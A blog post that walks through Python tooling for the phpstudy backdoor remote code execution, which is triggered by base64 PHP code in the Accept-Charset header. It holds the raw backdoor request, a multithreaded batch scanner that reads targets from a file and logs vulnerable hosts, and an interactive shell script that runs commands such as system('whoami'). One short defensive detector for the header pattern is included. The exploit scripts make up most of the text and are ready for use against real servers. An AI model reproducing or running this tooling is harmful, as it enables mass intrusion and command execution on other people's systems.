
Implementing a batch exploitation script for the phpstudy backdoor RCE

Updated: 2023-04-08 04:22:20

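I wrote two scripts: one for batch checking and one interactive shell.

They are in Python for now. I also wrote a Qt GUI version, but it has some problems.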

Backdoor request:

```
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Accept-Charset: zwnobybzexn0zw0oim5ldcb1c2vyiik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
```

Executing that code to write a shell is all it takes.
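Seen from the defender's side, the request above stands out because `Accept-Charset` carries base64 text instead of a charset list. The following is an added example, not part of the original post: a small detector that parses a raw request and flags that pattern. The function names and both sample requests are constructed for illustration, and treating the exact `gzip,deflate` value as a confidence signal is an assumption based on the request shown on this page.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def parse_headers(raw_request):
    """Map lower-cased header names to values from a raw HTTP request."""
    headers = {}
    for line in raw_request.splitlines()[1:]:  # skip the request line
        if not line.strip():
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def decode_charset_payload(value):
    """Return the decoded text if value is base64 of readable text, else None."""
    if len(value) < 8 or len(value) % 4 or not B64_RE.fullmatch(value):
        return None  # real charset lists ("utf-8, iso-8859-1;q=0.5") stop here
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    readable = all(c.isprintable() or c in "\r\n\t" for c in text)
    return text if readable else None

def inspect_request(raw_request):
    """Return a finding dict for a suspicious request, or None if it looks normal."""
    headers = parse_headers(raw_request)
    decoded = decode_charset_payload(headers.get("accept-charset", ""))
    if decoded is None:
        return None
    # Assumption: the exact "gzip,deflate" value from the page's request raises confidence.
    return {"decoded": decoded,
            "page_encoding": headers.get("accept-encoding") == "gzip,deflate"}

# Constructed samples: the marker payload used by the page's checker, and a normal request.
MARKER = base64.b64encode(b'echo "qing";').decode()
SUSPICIOUS = ("GET /index.php HTTP/1.1\r\nHost: 127.0.0.1\r\n"
              f"Accept-Charset: {MARKER}\r\nAccept-Encoding: gzip,deflate\r\n\r\n")
NORMAL = ("GET /index.php HTTP/1.1\r\nHost: 127.0.0.1\r\n"
          "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS), ("normal", NORMAL)):
        print(name, inspect_request(raw))
```

The same check can be run over captured requests or a proxy log that records full headers; the decoded text in each finding shows what the sender tried to execute.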

In the evening I found a little time to write a simple request-sending script in Python:

```python
#!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# 卿 Blog: https://www.cnblogs.com/-qing-/
import base64
import requests

print("======phpstudy backdoor exploit============\n")
print("===========by qing=================\n")
print("=====blog:https://www.cnblogs.com/-qing-/==\n")

# Marker payload: the target echoes "qing" if the backdoor executes it.
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')

headers = {
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept-Charset': payload,
    'Accept-Encoding': 'gzip,deflate',
    'Connection': 'close',
}


def write_shell(url, headers):
    try:
        r = requests.get(url=url + '/index.php', headers=headers, verify=False, timeout=30)
        if "qing" in r.text:
            print('[ + ] backdoor successful: ' + url + '===============[ + ]\n')
            # Record hosts that echoed the marker.
            with open('success.txt', 'a') as f:
                f.write(url + '\n')
        else:
            print('[ - ] backdoor failed: ' + url + '[ - ]\n')
    except requests.RequestException:
        print('[ - ] timeout: ' + url + ' [ - ]\n')


url = "http://xxx"
write_shell(url=url, headers=headers)
```

The code after tidying up the interface, switching to multithreading, and batch-reading targets from a text file:

```python
#!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# 卿 Blog: https://www.cnblogs.com/-qing-/
import base64
import requests
import threading
import threadpool

print("======phpstudy backdoor exploit============\n")
print("===========by qing=================\n")
print("=====blog:https://www.cnblogs.com/-qing-/==\n")


def write_shell(url):
    # Marker payload: the target echoes "qing" if the backdoor executes it.
    payload = "echo \"qing\";"
    payload = base64.b64encode(payload.encode('utf-8'))
    payload = str(payload, 'utf-8')
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Accept-Charset': payload,
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'close',
    }
    try:
        r = requests.get(url=url + '/index.php', headers=headers, verify=False, timeout=30)
        if "qing" in r.text:
            print('[ + ] backdoor successful: ' + url + '===============[ + ]\n')
            with open('success.txt', 'a') as f:
                f.write(url + '\n')
        else:
            print('[ - ] backdoor failed: ' + url + '[ - ]\n')
    except requests.RequestException:
        print('[ - ] timeout: ' + url + ' [ - ]\n')

# url = "http://xxx"
# write_shell(url=url,headers=headers)


def main():
    # One URL per line in url.txt.
    with open('url.txt', 'r') as f:
        lines = f.read().splitlines()
    task_pool = threadpool.ThreadPool(5)
    reqs = threadpool.makeRequests(write_shell, lines)
    for req in reqs:
        task_pool.putRequest(req)
    task_pool.wait()


if __name__ == '__main__':
    main()

# Thread queue section
# th=[]
# th_num=10
# for x in range(th_num):
#     t=threading.Thread(target=write_shell)
#     th.append(t)
# for x in range(th_num):
#     th[x].start()
# for x in range(th_num):
#     th[x].join()
```

You can also add a dictionary of PHP file names to read from; that is simple and needs no further explanation.

Next is the interactive shell:

```python
#!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# 卿 Blog: https://www.cnblogs.com/-qing-/
import base64
import requests
import re

print("======phpstudy backdoor exploit---os-shell============\n")
print("===========by qing=================\n")
print("=====blog:https://www.cnblogs.com/-qing-/==\n")


def os_shell(url, headers, payload):
    try:
        r = requests.get(url=url + '/phpinfo.php', headers=headers, verify=False, timeout=10)
        # print(r.text)
        # The command output sits between the two "qing" markers.
        res = re.findall("qing(.*?)qing", r.text, re.S)
        print("[ + ]===========the response:==========[ + ]\n")
        res = "".join(res)
        print(res)
    except requests.RequestException:
        print("[ - ]===========failed! timeout...==========[ - ]\n")


def main():
    url = input("input the url , example:\"http://127.0.0.1/\"\n")
    payload = input("input the payload , default:echo system(\"whoami\");\n")
    # The default is wrapped in the markers below, so it must not carry its own.
    de_payload = "echo system(\"whoami\");"
    if payload.strip() == '':
        payload = de_payload
    payload = "echo \"qing\";" + payload + "echo \"qing\";"
    payload = base64.b64encode(payload.encode('utf-8'))
    payload = str(payload, 'utf-8')
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Accept-Charset': payload,
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'close',
    }
    os_shell(url=url, headers=headers, payload=payload)


if __name__ == '__main__':
    main()
```


Published: 2023-04-08 04:22:16
